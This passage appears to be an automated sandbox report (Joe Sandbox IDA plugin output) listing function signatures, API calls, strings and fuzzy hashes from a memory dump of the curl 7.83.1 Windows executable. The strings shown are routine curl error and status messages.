                                • Source File: 0000000D.00000002.2189168882.0000000000861000.00000020.00000001.01000000.00000007.sdmp, Offset: 00860000, based on PE: true
                                • Associated: 0000000D.00000002.2189145513.0000000000860000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189227593.00000000008B5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189263682.00000000008CF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189288243.00000000008D0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_13_2_860000_curl.jbxd
                                Similarity
                                • API ID: fputc$fputs
                                • String ID: u%04x
                                • API String ID: 1019900953-2707630279
                                • Opcode ID: 215baae85a46cd5c7bcc3ad244564b60acd099028eb1e4138368e6b543334db4
                                • Instruction ID: 79e18ce9f2128177304e234fe6f6c538d35a45c78cbf0c5212aa1c9b652bc54b
                                • Opcode Fuzzy Hash: 215baae85a46cd5c7bcc3ad244564b60acd099028eb1e4138368e6b543334db4
                                • Instruction Fuzzy Hash: 1D21D631149218F5EA28052AAC5DFB7AF99FA437A5B28C119F31EC168BC565C501CD91
                                APIs
                                • getsockname.WS2_32(?,?,?), ref: 0089A14D
                                • accept.WS2_32(?,?,00000080), ref: 0089A175
                                • ioctlsocket.WS2_32(?,8004667E,?), ref: 0089A1D8
                                Strings
                                • Connection accepted from server, xrefs: 0089A1A7
                                • Error accept()ing server connect, xrefs: 0089A192
                                Memory Dump Source
                                • Source File: 0000000D.00000002.2189168882.0000000000861000.00000020.00000001.01000000.00000007.sdmp, Offset: 00860000, based on PE: true
                                • Associated: 0000000D.00000002.2189145513.0000000000860000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189227593.00000000008B5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189263682.00000000008CF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189288243.00000000008D0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_13_2_860000_curl.jbxd
                                Similarity
                                • API ID: acceptgetsocknameioctlsocket
                                • String ID: Connection accepted from server$Error accept()ing server connect
                                • API String ID: 36920154-1795061160
                                • Opcode ID: 1a244a48199f14bb2abf615f8303eb9d43dbd70e6e10e8061639ca6ecf81a1a6
                                • Instruction ID: 122bf5744e693c6e59f4b73dbdf829e420e9f2e8ff3e13b69a37aeb9c630f989
                                • Opcode Fuzzy Hash: 1a244a48199f14bb2abf615f8303eb9d43dbd70e6e10e8061639ca6ecf81a1a6
                                • Instruction Fuzzy Hash: A031D531A00214DFDB14AB38DC45BEAB7B9FF44714F1482AAE85DE7281DF715D888BA1
                                APIs
                                • calloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00899557
                                • ___from_strstr_to_strchr.LIBCMT ref: 00899584
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 008995A3
                                Strings
                                Memory Dump Source
                                • Source File: 0000000D.00000002.2189168882.0000000000861000.00000020.00000001.01000000.00000007.sdmp, Offset: 00860000, based on PE: true
                                • Associated: 0000000D.00000002.2189145513.0000000000860000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189227593.00000000008B5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189263682.00000000008CF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189288243.00000000008D0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_13_2_860000_curl.jbxd
                                Similarity
                                • API ID: ___from_strstr_to_strchrcallocfree
                                • String ID: +$Got unexpected pop3-server response
                                • API String ID: 1802162112-3277052657
                                • Opcode ID: b53f5d18d4f4894c50a92ddc9e33b54aa748fc159667bf10c85953e550b2b227
                                • Instruction ID: 23c5aa8d4f5145886e4e74d8a35941a65a287a88d3135831bf78354593ac0b8b
                                • Opcode Fuzzy Hash: b53f5d18d4f4894c50a92ddc9e33b54aa748fc159667bf10c85953e550b2b227
                                • Instruction Fuzzy Hash: BD315B71A00205AFEF2AAF29D841B9ABBE4FF40360F19015ED585E7241DB706D408694
                                APIs
                                • calloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,0088E982,00000000,?,?,?,0088EB73), ref: 0088E849
                                • htons.WS2_32(?), ref: 0088E85B
                                • inet_pton.WS2_32(00000017,::1,?), ref: 0088E877
                                Strings
                                Memory Dump Source
                                • Source File: 0000000D.00000002.2189168882.0000000000861000.00000020.00000001.01000000.00000007.sdmp, Offset: 00860000, based on PE: true
                                • Associated: 0000000D.00000002.2189145513.0000000000860000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189227593.00000000008B5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189263682.00000000008CF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189288243.00000000008D0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_13_2_860000_curl.jbxd
                                Similarity
                                • API ID: callochtonsinet_pton
                                • String ID: ::1$localhost
                                • API String ID: 4237634067-466958357
                                • Opcode ID: 633bc79a653043abfbfeb235ac7715190e57ad02a2e4a3ce0551830d20b3a5a1
                                • Instruction ID: 8d8b8fecb0758cb2d122ac428a169a0caa42b25fca076308f1f75332818f5062
                                • Opcode Fuzzy Hash: 633bc79a653043abfbfeb235ac7715190e57ad02a2e4a3ce0551830d20b3a5a1
                                • Instruction Fuzzy Hash: 4921D132A106089BDB04DF54D885B9F7BF5FF09325F10402AE904EF282D7B1E909CB95
                                APIs
                                • ___from_strstr_to_strchr.LIBCMT ref: 00889EDF
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00889F59
                                Strings
                                Memory Dump Source
                                • Source File: 0000000D.00000002.2189168882.0000000000861000.00000020.00000001.01000000.00000007.sdmp, Offset: 00860000, based on PE: true
                                • Associated: 0000000D.00000002.2189145513.0000000000860000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189227593.00000000008B5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189263682.00000000008CF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189288243.00000000008D0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_13_2_860000_curl.jbxd
                                Similarity
                                • API ID: ___from_strstr_to_strchrfree
                                • String ID: %s%s%s:%d$Host$Host: %s
                                • API String ID: 653773606-4134764909
                                • Opcode ID: 9c26bb3d8fa84defd753763fc09996172ac165b035412b8bde0bcab18dc8f3f4
                                • Instruction ID: e9c173ef9160256d49aa06e905198704901cb7dbc49ac4b40bb0ea629f73c28c
                                • Opcode Fuzzy Hash: 9c26bb3d8fa84defd753763fc09996172ac165b035412b8bde0bcab18dc8f3f4
                                • Instruction Fuzzy Hash: 19110B727086056F9B196E59DC42F7A37A9FF85B60B54402DFA05DB340EA71EC408760
                                APIs
                                • strtoul.API-MS-WIN-CRT-CONVERT-L1-1-0(?,?,0000000A), ref: 0088333A
                                • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 0088336C
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 008833AA
                                Strings
                                Memory Dump Source
                                • Source File: 0000000D.00000002.2189168882.0000000000861000.00000020.00000001.01000000.00000007.sdmp, Offset: 00860000, based on PE: true
                                • Associated: 0000000D.00000002.2189145513.0000000000860000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189227593.00000000008B5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189263682.00000000008CF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189288243.00000000008D0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_13_2_860000_curl.jbxd
                                Similarity
                                • API ID: _errnofreestrtoul
                                • String ID: 0Lu@Ru@/Mu$Invalid zoneid: %s; %s
                                • API String ID: 3069384960-306810487
                                • Opcode ID: 9062c7ab9d1e2aac9b6ef5e5ac5893c308a445127a3e8a8a20622907ed259a28
                                • Instruction ID: ff496ba0b25e6d95b6e62d16499cf2aa9762550b5c8fd6b4963fb92c100be6ef
                                • Opcode Fuzzy Hash: 9062c7ab9d1e2aac9b6ef5e5ac5893c308a445127a3e8a8a20622907ed259a28
                                • Instruction Fuzzy Hash: C421C631A0061CABDB24AB24EC45FED77B9FF8AB10F14419AE909D7391DF709E448B91
                                APIs
                                • htons.WS2_32(?), ref: 0088E8FF
                                • inet_pton.WS2_32(00000002,127.0.0.1,?), ref: 0088E913
                                • calloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,?,?,?,0088EB73,?,?,?), ref: 0088E937
                                  • Part of subcall function 0088E822: calloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,0088E982,00000000,?,?,?,0088EB73), ref: 0088E849
                                  • Part of subcall function 0088E822: htons.WS2_32(?), ref: 0088E85B
                                  • Part of subcall function 0088E822: inet_pton.WS2_32(00000017,::1,?), ref: 0088E877
                                Strings
                                Memory Dump Source
                                • Source File: 0000000D.00000002.2189168882.0000000000861000.00000020.00000001.01000000.00000007.sdmp, Offset: 00860000, based on PE: true
                                • Associated: 0000000D.00000002.2189145513.0000000000860000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189227593.00000000008B5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189263682.00000000008CF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189288243.00000000008D0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_13_2_860000_curl.jbxd
                                Similarity
                                • API ID: callochtonsinet_pton
                                • String ID: 127.0.0.1$localhost
                                • API String ID: 4237634067-2339935011
                                • Opcode ID: f345f34e0816b3a3a99c53dbd3b539076911069f5d8b5d52247569ce557ffc0d
                                • Instruction ID: 6c62d38ebf2a1e5366e6b8c357a02c6282c098759d381fcb439c11f0b36a1800
                                • Opcode Fuzzy Hash: f345f34e0816b3a3a99c53dbd3b539076911069f5d8b5d52247569ce557ffc0d
                                • Instruction Fuzzy Hash: EE11B175A007089BDB01DF94DC8569BBBF5FF49310F20416AE904EB241D7F1D945CB90
                                APIs
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 00867F43
                                • _strdup.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 00867F5F
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 00867F89
                                • _strdup.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 00867FA5
                                Strings
                                Memory Dump Source
                                • Source File: 0000000D.00000002.2189168882.0000000000861000.00000020.00000001.01000000.00000007.sdmp, Offset: 00860000, based on PE: true
                                • Associated: 0000000D.00000002.2189145513.0000000000860000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189227593.00000000008B5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189263682.00000000008CF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189288243.00000000008D0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_13_2_860000_curl.jbxd
                                Similarity
                                • API ID: _strdupfree
                                • String ID: a
                                • API String ID: 1865132094-3904355907
                                • Opcode ID: 8ad059fdda462a7dca0bc4ec48f8c945ce3cb7d0d62b792b8b95d573eb9d198c
                                • Instruction ID: 7874b7b356ab9680a54dbc82b599001945c39f6a1a2af4699ea39815163d6ee0
                                • Opcode Fuzzy Hash: 8ad059fdda462a7dca0bc4ec48f8c945ce3cb7d0d62b792b8b95d573eb9d198c
                                • Instruction Fuzzy Hash: 2921497060C7819FD720CE7894946ABBBE5FB89318F1A4E1EE19ED7240DB3098058782
                                APIs
                                • GetModuleFileNameA.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(00000000,008CF580,00000200,.curlrc,00000000,00000000,.curlrc,?,0086DC8B,?,00000000,00000000), ref: 0086DB9B
                                • _strrchr.LIBCMT ref: 0086DBAC
                                • fopen.API-MS-WIN-CRT-STDIO-L1-1-0(008CF580,008B7A20,00000000,00000200,%s%s,008B734C,.curlrc,?,0086DC8B,?,00000000,00000000), ref: 0086DC03
                                Strings
                                Memory Dump Source
                                • Source File: 0000000D.00000002.2189168882.0000000000861000.00000020.00000001.01000000.00000007.sdmp, Offset: 00860000, based on PE: true
                                • Associated: 0000000D.00000002.2189145513.0000000000860000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189227593.00000000008B5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189263682.00000000008CF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189288243.00000000008D0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_13_2_860000_curl.jbxd
                                Similarity
                                • API ID: FileModuleName_strrchrfopen
                                • String ID: %s%s$.curlrc
                                • API String ID: 494197015-3900187666
                                • Opcode ID: edad890756f923eccb56479d0b97cc9b1a2536065fc3a39d7cacab43cd0fb051
                                • Instruction ID: e54b3259ee5f3bc121aa8876f5b855af0ced087347829e7b7a9a338e2990e579
                                • Opcode Fuzzy Hash: edad890756f923eccb56479d0b97cc9b1a2536065fc3a39d7cacab43cd0fb051
                                • Instruction Fuzzy Hash: E21144317083086AEB186E288C85FAA7BA9FB863A4F15017DE502D7382D9A29D058270
                                APIs
                                • puts.API-MS-WIN-CRT-STDIO-L1-1-0(Build-time users:), ref: 00868BAB
                                • puts.API-MS-WIN-CRT-STDIO-L1-1-0( <none>), ref: 00868BDB
                                  • Part of subcall function 008720F5: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000001,?,?,?,00868A7A,curl 7.83.1 (Windows) %s,00000000), ref: 00872101
                                Strings
                                Memory Dump Source
                                • Source File: 0000000D.00000002.2189168882.0000000000861000.00000020.00000001.01000000.00000007.sdmp, Offset: 00860000, based on PE: true
                                • Associated: 0000000D.00000002.2189145513.0000000000860000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189227593.00000000008B5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189263682.00000000008CF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189288243.00000000008D0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_13_2_860000_curl.jbxd
                                Similarity
                                • API ID: puts$__acrt_iob_func
                                • String ID: %s$ <none>$Build-time users:
                                • API String ID: 1292152210-2903797034
                                • Opcode ID: 74f9461b42c93e82062f12d192531e51ca0b4c51484b6027f03b5099f2c7ac55
                                • Instruction ID: a2c0a3ded457c291224c071bb36566873176224131d90f4e7649cea45c9b716a
                                • Opcode Fuzzy Hash: 74f9461b42c93e82062f12d192531e51ca0b4c51484b6027f03b5099f2c7ac55
                                • Instruction Fuzzy Hash: 2701DB71905208EBCB08EF54D916DDD7774FF05710F140159F409E2381EF709F009646
                                APIs
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?), ref: 008AC3E2
                                • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?), ref: 008AC5B5
                                Strings
                                • Excessive server response line length received, %zd bytes. Stripping, xrefs: 008AC525
                                • cached response data too big to handle, xrefs: 008AC5EC
                                • response reading failed, xrefs: 008AC441
                                Memory Dump Source
                                • Source File: 0000000D.00000002.2189168882.0000000000861000.00000020.00000001.01000000.00000007.sdmp, Offset: 00860000, based on PE: true
                                • Associated: 0000000D.00000002.2189145513.0000000000860000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189227593.00000000008B5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189263682.00000000008CF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189288243.00000000008D0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_13_2_860000_curl.jbxd
                                Similarity
                                • API ID: freemalloc
                                • String ID: Excessive server response line length received, %zd bytes. Stripping$cached response data too big to handle$response reading failed
                                • API String ID: 3061335427-1004035239
                                • Opcode ID: 9111facfa61c64b1df2adb2bd4adaf4a255c5784593661b174afc3ab471999c5
                                • Instruction ID: e10a571bbe98403768bffe97edaa87ff5436fa8653f8ba546881f1b062f794fd
                                • Opcode Fuzzy Hash: 9111facfa61c64b1df2adb2bd4adaf4a255c5784593661b174afc3ab471999c5
                                • Instruction Fuzzy Hash: 82A17971A0070AAFEB04CFA8C891AAEFBB5FF49314F14C52AE815E7741D775A910CB94
                                APIs
                                  • Part of subcall function 008AAB9A: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,00889633,00000000), ref: 008AABCC
                                  • Part of subcall function 008AAB9A: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,00889633,00000000), ref: 008AABFD
                                  • Part of subcall function 008AAB9A: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,00889633,00000000), ref: 008AAC1F
                                  • Part of subcall function 008AAB9A: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 008AAC36
                                  • Part of subcall function 008AAB9A: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 008AAC50
                                • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,008A0F4D,?,?,00890D79,?,?,00000000,?,?,?,00890B5D), ref: 008AA8FF
                                • calloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,008A0F4D,?,?,00890D79,?,?,00000000,?,?,?,00890B5D,?), ref: 008AA94A
                                Strings
                                Memory Dump Source
                                • Source File: 0000000D.00000002.2189168882.0000000000861000.00000020.00000001.01000000.00000007.sdmp, Offset: 00860000, based on PE: true
                                • Associated: 0000000D.00000002.2189145513.0000000000860000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189227593.00000000008B5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189263682.00000000008CF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189288243.00000000008D0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_13_2_860000_curl.jbxd
                                Similarity
                                • API ID: free$callocmalloc
                                • String ID: NTLM$SSPI: couldn't get auth info
                                • API String ID: 1437353635-1544621284
                                • Opcode ID: 2d99630143213aafd2018d6fc01d7a1fd8699cea5f6d592e51bbe5b42115f2d0
                                • Instruction ID: 20dbf421c4946eb0a0b6f5f3ec97f576b3dd33bf050c61a25a873339881873fc
                                • Opcode Fuzzy Hash: 2d99630143213aafd2018d6fc01d7a1fd8699cea5f6d592e51bbe5b42115f2d0
                                • Instruction Fuzzy Hash: 2C518E7560461AAFEB088F58DD84AAE7BF9FF09310B14412AE905E3B90DB70AD04CF91
                                APIs
                                  • Part of subcall function 008709FA: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?), ref: 00870A07
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 008A1DC6
                                Strings
                                • Found %I64d bytes to download, xrefs: 008A1D02
                                • Failed to parse FETCH response., xrefs: 008A1CA0
                                • Written %zu bytes, %I64u bytes are left for transfer, xrefs: 008A1D7B
                                • *, xrefs: 008A1C60
                                Memory Dump Source
                                • Source File: 0000000D.00000002.2189168882.0000000000861000.00000020.00000001.01000000.00000007.sdmp, Offset: 00860000, based on PE: true
                                • Associated: 0000000D.00000002.2189145513.0000000000860000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189227593.00000000008B5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189263682.00000000008CF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189288243.00000000008D0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_13_2_860000_curl.jbxd
                                Similarity
                                • API ID: _errnofree
                                • String ID: *$Failed to parse FETCH response.$Found %I64d bytes to download$Written %zu bytes, %I64u bytes are left for transfer
                                • API String ID: 1830139605-1126424615
                                • Opcode ID: 0e1c66e3745966dcc1e5d8d062500adb13521784e86e3ff819673d0924d08204
                                • Instruction ID: 9cd05b23da138df1f2064b5a284543f0914a4935ba8074f02e3142478380c332
                                • Opcode Fuzzy Hash: 0e1c66e3745966dcc1e5d8d062500adb13521784e86e3ff819673d0924d08204
                                • Instruction Fuzzy Hash: EE51F971A40605AFEF14DB28C889FBAB7B5FF46324F14826DE558E7282D7706D408B91
                                APIs
                                • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,00890591,00000001,00000000,00000000,00000000,?,?,?), ref: 008A6847
                                Strings
                                Memory Dump Source
                                • Source File: 0000000D.00000002.2189168882.0000000000861000.00000020.00000001.01000000.00000007.sdmp, Offset: 00860000, based on PE: true
                                • Associated: 0000000D.00000002.2189145513.0000000000860000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189227593.00000000008B5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189263682.00000000008CF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189288243.00000000008D0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_13_2_860000_curl.jbxd
                                Similarity
                                • API ID: malloc
                                • String ID: %c%c%c%c$%c%c%c=$%c%c==$ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/
                                • API String ID: 2803490479-989668499
                                • Opcode ID: 84a108b09ec91df0ce00693350dc94439341f9b133629e747e01f6e73b4fbdc5
                                • Instruction ID: 417be64528c5d5aeae13b7935fd07aaad075878928b5d5c32bf6b4b1ca68ccc2
                                • Opcode Fuzzy Hash: 84a108b09ec91df0ce00693350dc94439341f9b133629e747e01f6e73b4fbdc5
                                • Instruction Fuzzy Hash: CC415A759046945FE7058A7888547BF7FF9FB47310F0C41D9E8A4D7386E5388A02CB60
                                APIs
                                • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,00000000,00000000), ref: 0088E61D
                                • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,00000000,00000000), ref: 0088E657
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,00000000,00000000), ref: 0088E6F0
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,00000000,00000000), ref: 0088E70A
                                Strings
                                Memory Dump Source
                                • Source File: 0000000D.00000002.2189168882.0000000000861000.00000020.00000001.01000000.00000007.sdmp, Offset: 00860000, based on PE: true
                                • Associated: 0000000D.00000002.2189145513.0000000000860000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189227593.00000000008B5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189263682.00000000008CF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189288243.00000000008D0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_13_2_860000_curl.jbxd
                                Similarity
                                • API ID: freemalloc
                                • String ID: Shuffling %i addresses
                                • API String ID: 3061335427-3589116693
                                • Opcode ID: 8d177ef4d8afb0a58f35653844ef71796ab01944209cd089f0fc872ee100f446
                                • Instruction ID: 2e158a295c5f759cae23641bdf3f356bb892cd8c6fe3e05ed206a44c158ae3b8
                                • Opcode Fuzzy Hash: 8d177ef4d8afb0a58f35653844ef71796ab01944209cd089f0fc872ee100f446
                                • Instruction Fuzzy Hash: AC413675E0062A9FCB18EF68D88496EBBF5FF49754B15416AE805EB351EB30AD01CB80
                                APIs
                                • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 0086FD9E
                                • calloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000001,00000B08), ref: 0086FDBD
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 0086FDCC
                                Strings
                                Memory Dump Source
                                • Source File: 0000000D.00000002.2189168882.0000000000861000.00000020.00000001.01000000.00000007.sdmp, Offset: 00860000, based on PE: true
                                • Associated: 0000000D.00000002.2189145513.0000000000860000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189227593.00000000008B5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189263682.00000000008CF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189288243.00000000008D0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_13_2_860000_curl.jbxd
                                Similarity
                                • API ID: callocfreemalloc
                                • String ID: %s in URL position %zu:%s%*s^$curl: (%d) %s
                                • API String ID: 4086611775-2317922172
                                • Opcode ID: 75f8cd3dac3c3b9421eabd8e4bc1a330c2085c11416dfcaaaa4b26f56f3d1959
                                • Instruction ID: 584d6ccddd8cb21ca7a25e4673b1f0cdbbf1ec7f8ad18a6445550e2636183e1b
                                • Opcode Fuzzy Hash: 75f8cd3dac3c3b9421eabd8e4bc1a330c2085c11416dfcaaaa4b26f56f3d1959
                                • Instruction Fuzzy Hash: 8B410375A002099FDB24CF68D884BEAB7B5FF85314F1041ADE519DB342EB71AD418B60
                                APIs
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 0089E0B6
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 0089E0D4
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 0089E0EE
                                Strings
                                Memory Dump Source
                                • Source File: 0000000D.00000002.2189168882.0000000000861000.00000020.00000001.01000000.00000007.sdmp, Offset: 00860000, based on PE: true
                                • Associated: 0000000D.00000002.2189145513.0000000000860000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189227593.00000000008B5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189263682.00000000008CF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189288243.00000000008D0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_13_2_860000_curl.jbxd
                                Similarity
                                • API ID: free
                                • String ID: Failure sending QUIT command: %s$QUIT
                                • API String ID: 1294909896-1162443993
                                • Opcode ID: 89d4b3ebb5bafeccd8b9870b0ddc944bebf2b7eff84276b61b4c7b9d07346d05
                                • Instruction ID: 598490b027315872c6a9728b9b4d65cb7cef68ed3a1cc184fbb03b8c01f4ecb7
                                • Opcode Fuzzy Hash: 89d4b3ebb5bafeccd8b9870b0ddc944bebf2b7eff84276b61b4c7b9d07346d05
                                • Instruction Fuzzy Hash: 4C31D271604B05ABDF14AF389888B6ABBE5FF45314F08817EE919C7382DBB5A8008791
                                APIs
                                • ___from_strstr_to_strchr.LIBCMT ref: 00866762
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 00866790
                                • _strdup.API-MS-WIN-CRT-STRING-L1-1-0(10000000), ref: 008667A9
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 008667D1
                                • _strdup.API-MS-WIN-CRT-STRING-L1-1-0(01000000), ref: 008667EA
                                Memory Dump Source
                                • Source File: 0000000D.00000002.2189168882.0000000000861000.00000020.00000001.01000000.00000007.sdmp, Offset: 00860000, based on PE: true
                                • Associated: 0000000D.00000002.2189145513.0000000000860000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189227593.00000000008B5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189263682.00000000008CF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189288243.00000000008D0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_13_2_860000_curl.jbxd
                                Similarity
                                • API ID: _strdupfree$___from_strstr_to_strchr
                                • String ID:
                                • API String ID: 104559748-0
                                • Opcode ID: 8d004d67615b662eb549b78ce1a49acdfa8bdaeaa6ef0ce50359b46e818eeef3
                                • Instruction ID: 2346a6871dfb9765c623b3dbc72db9686a3d79cbb91e1c435bbb6fe4bbd82f07
                                • Opcode Fuzzy Hash: 8d004d67615b662eb549b78ce1a49acdfa8bdaeaa6ef0ce50359b46e818eeef3
